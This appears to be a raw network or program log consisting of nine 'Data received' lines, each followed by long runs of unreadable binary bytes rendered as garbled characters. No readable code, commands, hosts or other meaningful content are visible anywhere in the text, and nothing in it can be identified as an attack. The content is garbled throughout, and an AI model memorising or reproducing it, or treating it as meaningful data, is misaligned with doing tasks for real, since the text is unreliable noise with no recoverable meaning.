Data received ¶ÆMØÛüfŒ€ÕœØ 7÷'Âô{¯ŌÚ+†ÃÕÿ²ÍVÕ¤¥™- . /¼Ñvg„Š¡Ð¥(j8•º+NÚØ\C,£q‡ÔBs‰mïÐÁ©43Ý@EYMցpÜÓgmä‹ÃH6šùy¼µ)YNARÙPêÕy–Ѽ<â%è> ;?¬·%PÆÏÖD°þZ¤&G®ÎÃ&¼uß ªi© ˜·›¢! ·Õ:U¯iâ‘e]Õ®9¬‚|swûÚ͋>ï”) å°AþÒt"Î >·9%­sláóâ’ç(ÊwÕ±i<ˆÛ¦ó)’ ¢ÏLZC?-úgwøÕLbDìû¨A£Ç“¡¤×ÂËÃ)±ÏÔtÕwk™ˆ)›°1&ŽÆ‚^JïuŒP¦¡RG?¦ºKUµÊ»úôðí6v/<HºUQ30„J³üç‡ Ë¡_îg0 bZF„—¸”&ò¨_Ø+hèM+÷ùcEP’6)Õ7çã|*ÕâöD?wßALÌ]hŒ<§YƒRd E‘ŸÞ×2¹M™€üJ¾šˆ³ÞO ¶Å^»*¶>¶ž^íAçÿÈä˜èébÿ)òí-–ë€ÄBÆ÷›#Ù?vQƒËbȊ󈴮Tô2™D0& æSþ]îC¸1Ov(¥ŒÍ&i‚|žñ7gŸž:QšgguMžJZè àåž|çÞ³—Û>J’ éŸé„R%azÊ·ÛIãq§GSJü°Äè˜Zl冸îêÝV¡8EêýÆO¨æž˜¬½‚pjxQ^:Ìt™ÕÀ¯ u(‚Ñ5GDsȝ‰®ãD‡£„ª±þ¼8üÊ¿<þÚԈìêfU¨)ñÍÁÑC´â#º±±Ì÷Ɋ6éúõڎ€ Ď |Í/€æRqAÚyæ’ÿHF:-f0•Z›t^â볈:dú:d·¨ªG[ä×%€„@½fòþi‘Ô–ýÅæ¸/9ø,‘^ÿ÷žn¤ºìõ¬ðwèÔM—Vùîãž”ŠÅ|'™Äîy¾à¶ÿ× ÈŽ×U#ImçÓËKF3¡ÁT¸‹Ù§ç5X¾‘ß,Ç酅÷ w¢’ÜÎcÈQ•„ˍ"}Þ§¬ñª7¼38¥eئnMní›…àÓüƒ+ªoÇþeõ5­’ThÜæé[x¹¼rKŒÖùúz`}ú’T˜z$Tý–L+aÖá̑r.¦È\ GŒ¶CÈ~[qiZ¦ÒÅö®šàéߥòօ²‘|ßÏ dŽ —xŒ:oÝz7&¿Ì“LÓP®…A °‹LôºÚfMž3ñ”Ÿ™.o%û©hɨڐÞõyefóó4^f}Ú×~ƒ­Ò;7|Yù¢WûTÆþ@@Æ=V˜Å†ø›ÿÅÀµ6}Gãëþ0 –}.ï åßÈ˽榲¥À(>ÜÏErSeIGðqό%QåZœÅq5xRúZ®µœ|JÎÛóHø 0÷we‚—4;;TYnÿl’pD!8ÖCÄԀÛvÖ®šM¶UÆ%<5¢yÉ+Äé㤽‚u£ëw e7Ö±g•-µL¸”%x&X}»áNÚùf¥Ô¥,FËSüç Üé#ñ¸Í»T¾ƒ‡I&Â3K'Žà„e#óÿ㡛ŽYàP`>wÓföס©Í±%WŠ¢0W~߉K:(u$\ Üs9ínèÙý®beƒÜך÷øß¼Šð©„íŸÜýыŽÝ¡îj^œHš;*K¥&{üÒÐÌäõ,Dïz´þ9襑0£cF21,¿±8åíÄ/täa
Data received Á‰SXÒMË%ÕÙ9¿m{¶óRÏúhÏÛµÏÈ´¹iÖ ƒ–ÿkÏó_˜­¨7wîðfËëZ¬x;Ù]?º§ÒŒé‘ý‡èÔäQ¹WrÆC¸*U½lX\6ú½‡w‰Óšl–¼[C)õh&‘ ’T»¬úÎӠޕ“ ÁnnöœÅîIá-ËSÆCYŠóšØ-ÀÀXÇ*°‡ŠÉ¥…eiëVÛÅkf”ÁÇdé˜eº·š®üwVý˂D^S³oè˜Ô§™¾±ÓCË ÑU#{W\‚ %T¸N¹¤ÿД‰GÂÊÐx@ŒOqa–¥"øµàq|‹†¹¿4m Ê®GJ„»â¾½¡Ÿ:Ü×ÿ {»@§°Ɨx.#æon‚é¸ò0Kžä<¦jý—AVÁux˵4‰ÌU+™Þ㼉“îeQíÒÛ '.±OžÑw”°Õ –2nŸµžHB#F„íüLø ºÀ0ªË®åÄ ÌžO×òŽÌ—QÏÂCúQÅ¥‡æƒë=ôɾ$âÿ¨Ù…± ·s×ṠᓠG-ïêo.·Dßcëɛ ð/‚$>ûºÚ4ܺփ2?®¢=˜6ʙÓ8T‰s£YžYfÍêý©R7~·ðNR »A>VPb‚˜ÌË7a­ªöêiªø:¨t ǽ)Q/ЏÊ°õ_‚¶ÓÞ°äúé+¦*ûì$DÙ%Œ5·ºiŽ÷¡ÜƒñžllÈük›‹ùqnŽ–µ¸z—Ë©Þb;Rœ’XöR©²&<™QÔÍQŽÍÎÉæC–ªPi¼¦¬Tƒi:¶BYþ7ŽJ„¸ã9{øür¼kÇÌ¡Sð§§ýF þÙ4lþµZ{ï_ ”gC*r‘`Ɖ(ƒ ³ôæð¢Ûºñ‚…å—5ä‡PU8/it:4/$_ÄØìøZ¨v Ê2ÍÍ|Óý ø ôÄç J½a¬rùcÏ$/™K7õX{FАso–*.Å z*áašm¿$³w«€£ÌÕé´— wYØD¨õØ5à:˜âûœÕñ‡sׁªQtrÚëö:˜-÷ÊìNS5rÕÐ:´ãZ’Kµ0R¨È¥°M]~zçcd ™,±—èÆÀÜø,QqÔ¬×9{‚b®òx>{‘¿±ÄâGý.¬Í«¹qÐJo…ïËsMUžõ«`è$0÷¼TS=RU›´â•µ¦U¤9]UÎW™Á,2KKÃöãÅNèá§öµ. êîP;ÐCö'×Ë¥¾*9’iµ[P:¤ó6P‹|·ûiÉôZQ¾6“òh¿ú $ݳ…nr“ÇÇʼn]Äî×ÈÄGÊïª{Eàïëþ~óÜm9ã×x:kU/e®—¨X9Rfm-}lº ®š6TÃ}²ᅷ01…½= (ù €Ëê‚u"¦ÈEZ}  “Ž«·|âèýšÃŸÊ¡v.¬1í‹N“€ =N½Ö+x\4Ú"T‰‚Ú¤¶ØÜ¿•—¯YïlhïÜ÷èaµ¬ŒÙ&WW'u˜Ê ×í±•ÝœIGÏö}4Žõ©—bóª°¡kí9qñŠ Åɜ¼\Vò^ÒðgÀSßµnp[+3Ûø'[Ipe>ôó qJ|1bÖ{Þµ SGˆÈóÖ>5CŠd)”c¡ºÇúà¶0„á{Ü_갓ñVÇD&ÀœšŠ7 ¡ã²Â못UMáÑËß]ÎðbqàXV1ÑYcåNHû?O)ÏéšJõ<È°Ëʐæm¯8q(¥? ˜¯'åâ
Data received (]؞ºä¨üû8÷Ũ.2Hû£oùÇnÍ[ŒP¿P±h^³ o½áöÁÊÔÉáïAï·ÊI‰zq‰K¶ég7"þÒR»»~‚¶(3”ýa0`•ø¿/˜ìs<v¹G#g(e‹ÊºcŠþÒ«'"Neôô >•ã'¯«c®Ã-Kõ68²y;Øÿ¨Ì¹»[X›Û@N*lü«ÝJ­nUš|;ÿB©tÇoù¤Cï «(žœío›'þW’L\•üÄ¿v?AFIÖûP^G¨Õàd3Õ^Éi+e®¹þDEŽ?j{äBŠÉh±KâÌ[%.®¨Å»Ù?Œ>-ˆ)¹Ë¦”MµyÄ.pCź˜abعÇ2}ÒRú¼(5&Ά èï3Ѥaþ®Ì9ö¹l̜¨Î“L~閉®·­àm éå XìӋQØå‚Ò©Þ7Œ†*ì=C{ÑÑáMý‰à–¾€ì‹Aů|ôn3='ítõdlši/وÌ> °ˆ}õ…L–õ‹¨häâ´ñg@Àû$åz¼Gh­±ôøS€|pU\~px³{RÇ:æ{¥GüAûp¿Z/pôÙ¯„²Ÿ¹»x.6À-OÐ!ÒÍõœn&k[3¾µûªN¯”…”Iª¼ƒááÝI ÿŸX‚¸ÖÏèËÀ4sqômŲ7DŽú¾§â{$oƒd¦"6ŠÁËÆmŽ Ì ;1ïRö«¥©ÿæ@#â=Àµqîé8•Y%í·²pÆ{£³™.¡\üG=nøykÇM}Hÿî³ï·1Üõ§éE>(ªÓ%ðÍÎìs+e,¡Á/Šë uï¡Ì‚ë í˜î Yí‡j!\Qˆêìÿ2ºðw‚šÒ¸#n Ro~äsÚA £Ì§(„ðäG”³ ­£qäW7¡¢eF]I·°pPöQ/» Áa÷ÞvÞl7%ñšö_É$Òðö ÷ p—Z)&x0g@ ~‡²×‹g„á¬Ò_ŽV#ùg©„LY–kX,MŠgǾ 2`«kž”>ԍ¶ŒfكìåK׬%ëD’i¤æ¯çn †Ê#MÉPŸr-bG"—2«‚dÆô#‰ž §t€ãõëÊcÛÌ:dZ•[}¤]Cx`}b·eDn ÚÛC¦³ã 1ښ?´<E|'Ä$Øíܨ5ÒÃgñJ^úOmLqTA•!¬°æ6¡e=¶æܽù˜‘™ÀáÝ:GËÿ*´>Öãœt;K@к¿'j±“Y̵µ;óê;‡‹îdà“ 3m0ØÙa˜b‚H•qöË]…€0Ç |nmòYxÒPB¢G­É?"H*V—–_ .z(Y1?÷²N³ªFÑÛ1/óű©[ŸÑ?pnzê3•ñêt*z^fŸ¼¸ä\Œ÷ÊÑJã5·Tt(Г ¢§ ZC¢JñãS|FkÖé  ǯ–žá@IF‹v»X8,¨Jt¹—¢¦}âê𤇣…' ´ÍîiëÚñûG*_ρë}Íøßâ]š*åäZÏëP-Ôh¼ÎìrZrAèÔ×X@šp§O¤ ¢”^GdÎbÀæ^¶Yn Ê7»€ŸÎmª6í MR¾ÿLEMt<9éiˆY¢‚c0ãÇ£“¬æËæ|3ò$õ0ýý/òÉ€%÷y“1®¸MÏ,1§xyI¢”vŽjWt\±nï9ÔöÎ*õ„ì øhKýó½U£ÝêЫi M†['©‰®F&&àQ~S?‡5L^˜>­4똼AƒA‹ƒÚ™Ö´¥
Data received ©BOßt³·âa9ÇFߧ“Ó.n"y{íî 3•Ò"Æþº¾¢ ‹2Š…VÇ»+%TP”Y»Š+üQ—œa½–ÞÃ<ÀÅ$ãÿÁ}<Î<ƒî3ÿ+0'¼(&bäݘ²´Ïö¨>7÷ “Î0P,b ¢k&V²`ʼnž³¸Œã݀ãâ°ZæBŒ ¨ÀîwBÐI·×«ƒnNœÞÃxh“.¬MšmÓ¹ƒýízÎח¶&~ÎÈïæÅD‚8Þ´|"/‚ªŠ&tùuÄPÜ°ê{€æòÓrâÆ ~&„ù<%o5é˜Ðʹ¥Â<Ƨ#Ë!—ÍÒð\VéÁüà'å•%én/š 9 ‚@€Itq¤ÿ¨ ÚÙp‰ß @¾ ·9[± E\󚨟¢ýÖ¼%éˆnÒ$n¾N+1ƒu:eN”y6®1y P唻n¸qjD«b$yÞÆB0laLR3í¥óƒN…v¾§ŠT*r›f Ïß|€—8$å~Âð”Ö”‘V‰Aúÿ¸ÈñùÑéõz@¢kì=ʔù¸lìÿ3h‘g†`´|$ÝÃ.HÀŒ° À*8¶ØŸàÙê54"o1o ¨~[I-H!⺷"±?xÓÓîa¨ö­¬™E1:²Ÿ¼y16>óá7A{¤„™ýè"NoÿoÿhUêL ·þ7 JN߶‰,n«ý›è!n]ÒFz^o̍Qp‹HC²¬¬Ía¼9Ø'VÀ ‘[üöK²ù|²eb@‹b &%ÚùEýû¸pø[ŠLðûÛÊH«9« ±Ÿ»é@¾ý)e©Æ ÷E®dmK‚~ŽIÿÀ£ u{÷…f›öÕÁ.l ggUƒûýÉeÈQ³½)GÆ,{½2‰Llø5Š„'[ë¬×ÑYÕi‡ïP¹›Zj]{D&¦4>d}Ÿ¼hk$*Œ\}•7ä¦aq”`€*bwÂÞ0ðþoÔà+硶³Ì”÷aDí­M9­Q™ù‘2‘*®²×öøGO6'§Î®Ôz«®sþ¼`Í<Fð+@¦eS%!­Xa1vg»;| Ä垐"Ø'Ô!]mЙ„9&åÕawà¸]ߍڵS&7¦ ÙLx‰MbŽ*€ƒ£.­ùÚwÌwK·y0Daë<¯©iT`AZO Eöh!&Šµ| ™ÚM¬§á»9œIòÒI4sÑ/º€!v`ÉÑ}vO‡klìtOˆ_0—ƒ¾»-6ˆU늕}¾H+0Åc­ÙL2^?˜º§©“Qü׳h¶øúßÐÌ{-©6åÙ*Íé%9rAÓ&°P­“تy6fùO"¿½ºcÊÙ Âó1ØfÞÕ}‡:ÿ„L7,¬‰ðý•ãtÍñ—ý Î4„z^§@mö‹“ÿà¹`Ý9_ŽQT–XYҖö@¯…6ΩC"£°“?,ãiÍÔßNMúMøÑÌÝQ`›`/ŒSž…)þH… #.MŜT¸‡Ì´éd;ÜWd€Nìޛž,hû ¥€}.ý–…LÁ߲¼©6ÀŸÙwa_yîÕˆ·¦›”[½¤lö…¢Uæ+öY;o§·WE‡J6c«ÌwИˆ†(T5W.Ý©–#L×¼ô×ïn—ø¸m7ˆQ » êVònoˆ7fÝ_mŠëUÊhï´B<ù!ѦoѤci‹œ ‰¹Ü3˜`쪚Weø‡é>ª’u‹žE.¢Ì;J¥@¥:úRôé ¦Ï4ú„¿;gMÒ $*ýŠoÈꅗ®HûSõ4U
Data received P
Data received ¡ •À)€U ÑxÄ À5²êô¬ò¼”Q¾tZ¨¨Ýæ„è[Í×dõpW§‹[îomyÃhÔ.2Bܘ1:¶Ç¹Vn4¦×5³ÿ\¨hý·žƒÏ[ ¹¡<\î“)y’[@Ql‘ÍŸß48L…YÈÞÓ)”Qè¥yŽÿ´ |4f\ɘò>‰‹ Ñëá¯8ø4‡] V@Ú0mAµ9, `ü)23¾“]w'óXúb|œ·ú g?¬D˜>ÌcÁ®È59(êù[¼uѯƽý \­ð /ÑJ ¹ŠgKµÏ ØÔëšÔ'7YJšõ;‚ˆâ.VøLv.UµV–Û¸PH÷ï!Ì~ Ñ´#g3å$¼l«‰U*¤ b¥ðçL²–“óâ_ÂQo™ÉKݛ<¥‚Ì$Rd·—ÜÇÝ¿ÊÎ~œƒé›(쌒 ᕠc*cj)Ԃ§¸&©•$õ=óÜd¸b0á^lÑëOe¨’m)ˆí„z%g@§¸î¾û´¤ÎªíÕãìû+n² gR® +Õ–aоY¯sÁ«Øp•V~€tW¦_ •I «œ¬¨ŸnÙíŽ ZŒX· ßBS]68˜ ûE«£Ývg’‘:d7ài‹4|ªtÚ,³Ð¿½;¥snxÇÀ–ÚKÁà•a1†qoýê<^#~¬H T¾ LïÐu8•c÷€¼ñ=£q oKܚlbàܨšKMú§( ¾‚lxùy­3äÖ£–´æºg¡²„ty•º¹ö*)aR`g®—Ê8¹t´‡=ö–U”§T1ô¶¾×»OQ£˜Ûu‘P<§ß9›%¥·k/ sJƒÒ²øãCñD°­¿Õa7etÀwÏè9 Êå”X@Êà¯àç,Od‚_øÌ=ÌA¢,R`¸ö?Eò‘ºMŒt¯›©U‡A ’ o`2}PÖضOj÷:ÚH´Õž&+ZwÚwˆE§wJ›>çÊ|n-&Ü"³³³øgóc5êüÒíÖ÷ß( +È_ŸFL Èùà»Úöº¦ñMû8ÄgXµõãCöD(+&´í9Šè[¶ØGƒËÞì$$UE,®wà~±õ †$*LnU›Êsg(ƒØ`8jm#Ãíå yÙÑðbS¿cTòbŽì1…ñ,R¢ºÍê±ûMòáJšgù XŽ(OàÀ&¸ mú OöÓÜú"ÿkVÁ‹@W±Õá—i‘/)3tVRƒßh.™gÚ$ÐN .îz¿v¹æ2Iø`xðÀgwȶj†BX°ë¡9u0Šø@¸öd¶Õ ÈÅpy»–Üã?ô55 ®9ø‡>>="ö×à#û÷ÉÌ)§‡O#ƒÅeû¢,ÖÄÕɕîÍYf~w¤‰Ý>©@jC¬|h¾›AŠ‘®ðèá¦üù¯^ܓwûß=8î¢B¼º)ób—QZ$=ÓÈR­ø½rŠZ©6qŒOô’@º<Ty˜jÓÙî›ãË®ÿE=o¶*¡–E1¡vÈ#ݟÜép¬R†¯YŠÑ¸5ê)µ7Z<¹­.ì~PèsïÞ'…ðÓď [˜¶Œÿ‚ãhÓêvnÙÖ¨EÌiŽ#q&Aó ”£¢2½ހ°E u:ÄúúµµÝÝ!‰Ù?}£œWAr{ÿÃ;Öÿîæp´9…-͔§VF¯ ú ŒpJÔØد5ШTu—}ý˜6bn.P:] ö«ÔÑ?€Hš¶~bw¬ ÝaL
Data received æSdúŸÐڜSr¹xÆ9ÎÚë'UÎÝQã6FÉeԄeÏʥÇ굫ÒCJ-ö·û¼t£W™ÝiÚ£r â¨r8¸%¼«J¾ÊMÏéæ§Õ ‹#ƒUgS¹È>ï¬.ë­/Çlضþ‘¹åqǬ6B[ KC†Añ:P¨ÕP§çp©ÏöLok2óÝöÉè{›ª g܃y# ÃD’rùWŊ‚%JÖdb’ï*Îáƒ|%#ŽlqBuS¥œÕK›ƒüÂ?c¢ÜSpúž|3‚$¾Î±N=ÜË¢TÇÚù ©°æpÔÉÙû÷L´{¦ÐÎÔ¤V[CÿïhòdøæNóEü ï-ó°éHg‡-ɔÇÙd™þ¦8iL†í‚þCeuåÔö 5Z¡Ë@tÞ¿-NKÄ~bÀha{Š7òc渷þié¡Ä›ý3@àÙ´¬e”;Í ¥<5~D ó² ڞ-«èðòœ2ÅEzþ2w= R%&ëzGäÝ™©ú«†ÎÃÁó•ÏpP:d¿ê»ðêVl® ‚5”µYO–²‹ŽõüŸøBœY³ž¡þql¶Œ µöügª±Ì ׸ÄDÆâVK^ê¨ÔKÈ:kÕ¹…cï.Ÿ/äB¾ë ¯_ûèÝV‹†›–¦Ï|ƒ6öqv‘nC¯;++´P IàDô"›h@#\²rjú½ˆ^…¼@ŽZêJEŽ¶N wJ·OäSrCƒS/i²+ítQSLæþè/ÃޜŠ P O–1«áù€÷±¾÷è]ÎN³ÚÈdfÁsÄ-9gË+sGté6Tæ­Ô¨}…0¡´¨pªÉ$C#ÔÇ0èçä+ÝR SÌ ìÔ ßb„Ù«xó¡m3²ÐÃßãf ¢P$?Y“ƒ²ªŸÖøh9G± Í÷îgËé×i .Ïøk8}ª˜ÍëZøÔäŒúÐx׸] BhtÙáè%Ž6®b'˛Œ]NQ-Jg0>M(¤ÙpUè\ᎍ2’‚¸ õ^AóËK#ø,2:ìåЮ9c֊ճݡoqäa¿¦ÇZ »&RHl¹Å°eêÙZ£ç„@Úª_‡·^Ã$F'Y.¦Gwˆ’ÈSãV ðˆeƘõo±ðR«Hñ¾‚@ öóÓe÷¼yƒq£-{sÿùò3Ïèls5”m»)åú@Eà¥rþÆÍègNÇš{³X»bU|hœÐéZҏR®ÅO œ“ ¼Ú3ÁÀ¯Wùo²®n”|PD-<g´?,:-ÙqA 3»–(³­ð?»Ð*­~UgÆ @ ½3&KÓ BÀÄ6Ý)B!5Ö>ˆÊŠ&ªŽ9_JÊÑSÈÜQ÷³¹GÅAa]¦©óvnÎ £!’Hki‡ÊGà Á‘ŽRQœ˜ñ»½066w‘SĪØyLèˆ îý± @è–W ½4ly5GBŽŸäy3:ô¥’ƒ¶íÂf&1w´óOz+7qþêG0C´ö=JÎF­ž<@Và@M}-R{†3~ÛU§õξUYX,?*½(=ÆÍKæ¹å듢;yã‹fpŸ¡(òh\æ%¦h¸;õPâ±Ìî!"@MJ< "+ÒOðÖÎ^Ìx÷àˆñ*1^ãRæ‚ÇH¡^Í@ ×A.œ@½n@ü 7|2{ë‰Ï $ Ÿ¡=øïb~ˆêZ±Ø9#ÁÇ~áH—­€…V|»hÁaIèïUês¥[âd»jøŠ$é"aÞ÷†òŠŽc¥ÜöSqí-±ÈoT½׾ݽ7ró"{…¡·Öêc9˜AÛxÊGlSß³¢GȀ€Í
Data received ÇÄjÃE òÛ¦µóìâm&·-–܁)N1ÔV¦Oûƒ;怡¬ûM߶V–œsŠ?ZΣ‚ak$0”š4òT³Q?-QÝÕ¢¯¦©Ž”§ŽZ#>bÙº¾õVd»#—|C-±[æõŽj×¥IQD+FÛ¾ù-Öø//.9%«ãe°Ò3H2mãÞ_¡ËÖØÒÀ1ÌAD"ñØ=jhZ…ÖV/ã±÷VªscÑ-íæH¤šLo%]9¾¶³B<Âv(¾@~òzͬˆVVÿMR+×Gh© §ØÛuûžEO:Έ¦4Àú%Zn Gô—]öºÚcÇô=¸ïإãš6‘ÂÕyÐhÈK7v÷–Æz±ju‹!‰Èå>±Ääò(†”>é9Þè¶ÐöùõWàüáqÅKÝñt…ãýÞÊçÆIK€ÁÂüH3/u鼌Þ5CÃ<–í£œ¿vóv‰á È}—ËIă)/°‹J…2% †ŒÚ oÈÊ%²·ÝAŠÌ—²Ç@ t_WãlŽ0²o#—±i¿ =ê8úx°Uʏx9t>9¦Ó·LÒÿ$š4f’p•¼Ûõ¼Ã ãՋ³ŒÏv y8Á²Ø}ÕºÄeÆà¹ò­yë,콯ÎoB‰-)s\²ƒû‹­<÷²݊h§b_#žñFgèCÔc´ò2ßnåîøµ>þgå¥ZIÕ÷Ùr¢£ÙÙºí”k‹¨ÆA†ðB›\˜Ïß*÷ÜÈp—¬õÈ4E”Â{è™,Q.]Nô§è%î±VÁG[Y*ó"Ê®’°×{B‚SĈÄH&°M¡w†ÆÖ¿á;1ò)-¡)6Ø G `xãÚg[z@˜EQks£-B qB3²WÑ¸Õ ìT0¢ €a,“µ«Jî¬-6 ¾ÎXGÞ)‡'e_VĔÙ7f"CqŒß´ûãôÚÃ2ŸÁ‹¾Iôé~ZGx$`aáŠØˆí-¦»žïҕ”Ñ̝J+ðÚ>ςÙÅé»*sIwÅå±8ð§&Löñ‰¶,ÞÄL´ÿ.c|óu/‘©i܎vDmm`hø6™åÙ9äÿ ýûv(ÁK¿/LÓ_×~Gd[+É+‘fü´”â Zën KvHR>¸ç¤Ä³õß "·Š|³WamôÆ+ÊÈnþ 1ÜÊõ¶ýTÈ ƒsç â=½O)Þ)=Šhˆ §Õ*BR£WMezMõYyà9<cÃö-ðA"òÚOÍȋõupÁOiÛ*lò2„¨{x¦Õ’X/˜ì¿þÀ"æö·Ø†‘"ù·ø1VQX¿^QŠ´!+¡Áª³Òԝ}œ¯<I¼Xᮧ”X–t„úHè$¶6Ïë$œ”YŒ¿*íC4]ËÚncø2an R·™´´6ö¤=֕´Œq"¡‰®ùJ&Lêx¼Ò^•qs:ȤTJQ 1L¸ò:¥Rc£FC£éb³ã*Áä¡CÐyýfDx¨§?o"g,bø†ý Ä¿, ¬¤¼L¡¯IX•o6—À¥º¦ð'ܱ“ËÅP;¿ÇÐCßk)IA‘h/KÈz.Þ ¯–lFإƍ/83×ÜP‰[3@âx˃8ì)Nâ¤ÍœJëÁ&ûς)keuâ”ĪøµËÒ¡‰ÕžFEøxQ ª-¨ ”pŽQ5ý³¦nLmÓ¬›~´,׊¶)†ÇCvª n¢{,c NõŒ{tÃT,=µ ¶úª«ÈþL«æ–nèõ¨>ùrß²þ9kԑMÎîûŽÔÞ¸+oULÃwÌ]¸~¤›2•¹¶îýBïæ
Data received ¢þ‹qI0Pvõ0þퟻS¡RÄ¿±er6x¤‡¨uw*s¡Ì,Y$r_•ÚlO”ì¯l(R'Äp¤r#η 1ˆÃ pW2@onÐË¥!¾Yeôg b#³š}2erÏFrd;ƒ ¯:'^†Þ.í˜l¾6¥ mÀ®§5?þ+)¡¶ÆzXSgÄí…E¿Ô!Z5p¿O­þ.ó 0UÃ3Ø¢´yL%oûýb}dt¢{]i‚™£)€Ë-Ù%›N™ã¸b½„¹EÎ$æ5|pšã¥›G™‡œW[21%¤ø•ý«fÅ ó<{¤îd1EÂÈ[…Â՗Š‰ÅÒ¥\3?[¸]–€ççO)¾gï˜9˜ôœMB@ÕúR…°Úï9˜ˆ¬5ÝíÀ2„O…,l‚»ÅXƒ|˜üPtà Ï)_ƒJù}XÛzex(•‡¼ÊKWKåzñ®{%ŽìÃàb®×A;–Ô^¬êŽS?åt Þ 𵸏[Ô ÍA»-Bö¶8éÀ4Gƒôddê–×[Û}7ºÅ‘B/|^ÅX°µBŒƃnOÈñÖÆb f ¿9×á×–dÀor*¬%䜺½üéw‡ß¿•v¹¨&VšS¿˜Ô—AÖP©-ñæ©é æCw,¨iÅEEÙd.Ð çM_í#©º+Msv<ŸˆÄË)Ú(ÇN§íßþm˜Tp%½XÝ—f¿ç¥˜4QëRÐzl>;÷>wlˆš0‚l:ya0 ‚[÷X1Ïõ4´=zÃùçø€®np{…˜„J ?Ê¿%»ì(vvàœi ñv æåÕ.·ÇUQ+ÍíDdÏÎéôÁV´Åhß|4nÖjüeˆÀÒ ZG߇j¿TqɆÑò3tɉf ÔíǙ &¤>góþö‚öÓõ–þ}l@<Íh/̸ÃK™GŹkÍ×/ ,ÎxOs"¨M„ÑÌù1#Õ(!-î†iñO™¬)tŸÊ€â£ó[9Ž &u‚™Výœ~8ıÒûØñ´éIÁ"v—;öœj»†{Ú«+ZMÁŒW\µ>í“)ͮ֩ŒçŽg?|(>Bʬ’ºÀ$ »ú‰ŠZ:V}‚£Õpi8Å~/xÅ@Ë~!òÂDnÄ ÅÂóƒßB9¢îy–DMz¶Î°° +»ÖÞ¢Zñ¢ÐBå4ÿ¦˜×$P¡ÕRw2ö±\C9¢žè?M”Á |²¦ý˜¼Ìµ'əD-϶šë”g2þ=ôò”—^è=Z¨qÚ°gZ"ÁêôǗ)¡ÔÁ-êg¢òPX¾Ã©×—о ÅúpñN gžž"A?ð¹U C‘¯N½Glª÷«µ_—80÷Ž‰Ïþœ+Î#íw8Ú,Gí9Á"‡ÞÏ?ìÔ5‹”¨­yu‚M’ÏÕG=ã üz¢ä_ÿ®¯Oßw¥´ è0Âö¾jS^CSͼ–‰>æuÏd¸fŸÚ!ypX/˜g 7yê)ž)d%½W!f2ŠÅ‹em4ñW¥°gþoE3Šïðépê¾]×G´‹Uâ *Ð'2ŠøB‰"z~D£1qYÃUmRB<ï;~”ûr¾LË|¥ªVãñß¹ÚªO¨MXúòÆr÷OTù*¶E%.ùÔ+™uài=¨ÏÊ⧔œs§1d„ðÔ ,YÝ\?žÞ°ˆ„š¿X’=ÃËKǃ§' ¬m™°Öï̖ÁíQ+šo–—w˜ÑÖÿv 3iª úìi5”ЛøíɄ@³OÉH¹?©wߢ¶Sß>'ñR4ªŽXÍ]’
Data received /Õ:u cr‡ú.¡¦®C–ŸšüÞ ·ÀTu/6¼€2rô¶1;_ˆèš—B\2ªÎìs‘çÔá«ny1±_qÒaQ·°+™rÛ¢ ®Èvzé?¨ºEç-îXÿ¸AÞPlT} ²ÀµÈÊaÄ/èÛ£®ÁÞ)gÐË9£á~EHMîöʀⵒJ˜iÖÖ ˜#/‰[«ˆÛѲáþ»~f¼ ö-“èM˜:}ôô•Cæñó¡©xöš¡8œÆ9c7քþÕø·ð׃"ý ‘¦ŸÇ@çë\·Q\à­_ñw•¶ĭǝ6sÃ@uüm¾Ôː?®©v‰šhÍu￘/SÒ¥!ÜÚr‚ô˛ ~¡ÎMiP\¶-ÞA:öèä/ÊՇ¤Õ¯nºB¿8ûAÇsùV„é;ƅ†P9‡Þ*f@¯å9ÄqFä8­v[Z£ÅaT¾<ÕmîÕ ¼Å,ZÕä{¸å¸:fm’2Ò’ô7ÇU¢„Lþ­¬~à#°\uŠoù÷ËqoŠh¦¾îîMfcږ£Ö’jÞ%Ë“[Ý? ø=&Åħo>­LÉ í#Þ;oŸ#‹b 1~OµKNÉkg@â1`6½¦sÈ#[þDŽ<r„M¿²/v>G¥Xø^ŽOK—TèÀ”hé ]­4ܯU¨dš²£ üçD® JL© “ó;˜á†÷ïõ"³m­îÙy<ÖoÕ´N“`›øLÆóIèÐX-‡ßôv8–Æ»„@½MGØÙ;o«›_¶%±/o½2F³ÐKãK}ðlB|V‘êÖ†U€¾EÃaöKõ×Kì«ßú’ŠÍxÉÄY‡ìOHÃ6X¶;ÿ"ia͎«’DÁBǯÕ"o‘°ZϒÄLÃÃ7ïrñ€TÑ¿ÂI´“@Üü9hHl¨ãtË£GîÌ4ÿ“+ÉôV·bÏLž)ö­)3X‚‚ßà°ÉŒL€$ÀÂý­ù¬!È[Ï0f¤ûU-î&¾!H·6=ŒdQ¶/²TFï´u@ù<dÂö߯hÀfù½SÁÉQÚ:üñNõ3¸•¿ÈF€³H‡cà;]*¡zÒDžÆo´õÂñã6ÌsJS³’ªZ½Ž‡­@jñE Š¦î愈üÃs3 ¦ûP?«ò”?՝uó ¤ÜtÏk˜®ÚD¸¬6âï^‹%“kÉ,ØïRæÄcõѸ´j莭2 .Ãæü}pGzÁT*¥#ôÂR¿Võý&œX‹ÎÔ (>n.)±bo¢¨TfÞ«krŽC—í-5Ô²³–" CÎdöö Ù¿ Ò#VF™BŠ®%¹>P®Äb(4{§f¦ñI’.•¾ZDaA­ƒ¢6^–v· ‹Ve¼×{ñXÌì»Q 2JIì>Œ5Çb%áÁç’KM÷,&”cÇvs'F‡5`º\9™W°¤Ÿ}ŒæDaF5§‘1…zE×QJ†4„ÐüÜa]·0DCõißOåi¨/X,mÙú% §’Ì¢t­kÆ6ä3eÆhÛùØ;"µLðX„3óo‹»ÄX*N „+Æy“jÛ|'7P$'Ùññ•ø%‘¡Óð¹úoWƒ§\^0zl08êªLz„‘qè ã`Ýp4?>k^ èj†µòrl«n S°å3™ÆVåz8 œ!û­‘ö&eè\&שñøršâ¶-æȪY~Ëk ýg¥Yc”]‘m.ÌÞ¸b§÷à šTê®Ë¯ŠÞ¦” ½ýÆæf‹ûY¬ïoû˜¾Ì$_ª§¤
